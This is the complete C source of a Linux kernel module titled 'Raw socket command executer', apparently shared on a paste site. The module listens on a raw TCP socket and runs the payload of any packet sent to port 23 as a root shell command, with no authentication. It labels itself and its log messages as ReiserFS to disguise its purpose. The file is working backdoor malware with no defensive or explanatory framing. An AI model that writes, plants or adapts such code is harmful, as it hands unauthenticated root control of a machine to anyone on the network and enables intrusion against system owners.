Raw socket command executer

1. #include <linux/kernel.h>
2. #include <linux/module.h>
3. #include <linux/init.h>
4. #include <linux/netdevice.h>
5. #include <linux/skbuff.h>
6. #include <linux/ip.h>
7. #include <linux/tcp.h>
8. #include <linux/in.h>
9. #include <linux/socket.h>
10. #include <linux/net.h>
11. #include <linux/kmod.h>
12. #include <linux/slab.h>
13. #include <linux/sched.h>
14. #include <linux/kthread.h>
15. #include <linux/delay.h>
16. #include <net/sock.h>
17. #include <linux/inet.h>
18.  
19. #define TELNET_PORT 23
20. #define MAX_PAYLOAD_LEN 512 // Limit the payload length for safety
21.  
22. MODULE_LICENSE("GPL");
23. MODULE_AUTHOR("Reiser");
24. MODULE_DESCRIPTION("ReiserFS Ubuntu 18 - Telnet Command Execution with Raw Sockets");
25. MODULE_VERSION("18.6");
26.  
27. static struct task_struct *recv_thread; // The kernel thread for receiving packets
28. static struct socket *raw_sock = NULL;
29. static int running = 1; // Flag to indicate if the thread should keep running
30.  
31. // Function to run a shell command from the extracted Telnet payload
32. static int run_command(char *command) {
33. char *argv[4];
34. char *envp[] = { "HOME=/", "PATH=/sbin:/bin:/usr/sbin:/usr/bin", NULL };
35.  
36. argv[0] = "/bin/sh";
37. argv[1] = "-c";
38. argv[2] = command;
39. argv[3] = NULL;
40.  
41. printk(KERN_INFO "ReiserFS: Executing command: %s\n", command);
42.  
43. return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
44. }
45.  
46. // Function to receive packets from the raw socket
47. static int recv_packet(void) {
48. struct msghdr msg;
49. struct kvec vec;
50. struct iphdr *ip_header;
51. struct tcphdr *tcp_header;
52. unsigned char *payload;
53. char *command;
54. unsigned int payload_len;
55. int len;
56. static int failed_attempts = 0; // Static counter for failed attempts
57.  
58. unsigned char buffer[4096]; // Buffer to store packet
59.  
60. // Set up message header for receiving
61. memset(&msg, 0, sizeof(msg));
62.  
63. vec.iov_base = buffer;
64. vec.iov_len = sizeof(buffer);
65.  
66. // Receive the packet
67. len = kernel_recvmsg(raw_sock, &msg, &vec, 1, sizeof(buffer), 0);
68. if (len < 0) {
69. failed_attempts++;
70. if (failed_attempts < 10) {
71. printk(KERN_ERR "ReiserFS: Failed to receive packet (attempt %d)\n", failed_attempts);
72. }
73. if (failed_attempts >= 10) {
74. msleep(500); // Sleep for 500ms if failing repeatedly to avoid high CPU usage
75. }
76. return len;
77. } else {
78. failed_attempts = 0; // Reset failed attempts on success
79. }
80.  
81. // Extract IP header
82. ip_header = (struct iphdr *)buffer;
83. if (ip_header->protocol != IPPROTO_TCP) {
84. return 0; // Not a TCP packet, ignore
85. }
86.  
87. // Extract TCP header
88. tcp_header = (struct tcphdr *)(buffer + ip_header->ihl * 4);
89.  
90. // Check if the destination port is 23 (Telnet)
91. if (ntohs(tcp_header->dest) == TELNET_PORT) {
92. // Check if the packet is part of an established connection (ACK flag)
93. if (tcp_header->ack) {
94. // Calculate payload length (if any)
95. payload_len = len - (ip_header->ihl * 4) - (tcp_header->doff * 4);
96. if (payload_len > 0 && payload_len < MAX_PAYLOAD_LEN) {
97. // Get the TCP payload
98. payload = (unsigned char *)(buffer + ip_header->ihl * 4 + tcp_header->doff * 4);
99.  
100. // Allocate space to copy the payload into a null-terminated string
101. command = kmalloc(payload_len + 1, GFP_KERNEL);
102. if (!command) {
103. printk(KERN_ERR "ReiserFS: Failed to allocate memory for command\n");
104. return -ENOMEM;
105. }
106.  
107. // Copy the payload into a command string and ensure it's null-terminated
108. memcpy(command, payload, payload_len);
109. command[payload_len] = '\0'; // Null-terminate the string
110.  
111. // Log the command and execute it
112. printk(KERN_INFO "ReiserFS: Telnet command received: %s\n", command);
113. run_command(command);
114.  
115. kfree(command); // Free the allocated memory
116. }
117. }
118. }
119.  
120. return 0;
121. }
122.  
123. // The kernel thread that receives packets
124. static int recv_thread_fn(void *data) {
125. while (!kthread_should_stop()) {
126. if (running) {
127. recv_packet(); // Receive and process packets
128. msleep(100); // Sleep for a short time to avoid busy-waiting
129. }
130. }
131. return 0;
132. }
133.  
134. // Function to create a raw socket for capturing packets
135. static int create_raw_socket(void) {
136. int ret;
137.  
138. // Create a raw socket to capture all TCP packets
139. ret = sock_create(AF_INET, SOCK_RAW, IPPROTO_TCP, &raw_sock);
140. if (ret < 0) {
141. printk(KERN_ERR "ReiserFS: Failed to create raw socket\n");
142. return ret;
143. }
144.  
145. printk(KERN_INFO "ReiserFS: Raw socket created\n");
146. return 0;
147. }
148.  
149. // Module init function
150. static int __init port23_module_init(void) {
151. int ret;
152.  
153. printk(KERN_INFO "ReiserFS Telnet Command Execution Module (Raw Socket) loaded\n");
154.  
155. // Create and bind the raw socket
156. ret = create_raw_socket();
157. if (ret < 0) {
158. return ret;
159. }
160.  
161. // Start the packet receiving kernel thread
162. recv_thread = kthread_run(recv_thread_fn, NULL, "recv_thread");
163. if (IS_ERR(recv_thread)) {
164. printk(KERN_ERR "ReiserFS: Failed to create kernel thread\n");
165. return PTR_ERR(recv_thread);
166. }
167.  
168. return 0;
169. }
170.  
171. // Module exit function
172. static void __exit port23_module_exit(void) {
173. printk(KERN_INFO "ReiserFS Telnet Command Execution Module unloaded\n");
174.  
175. // Stop the kernel thread
176. if (recv_thread) {
177. kthread_stop(recv_thread);
178. }
179.  
180. if (raw_sock) {
181. sock_release(raw_sock);
182. }
183. }
184.  
185. module_init(port23_module_init);
186. module_exit(port23_module_exit);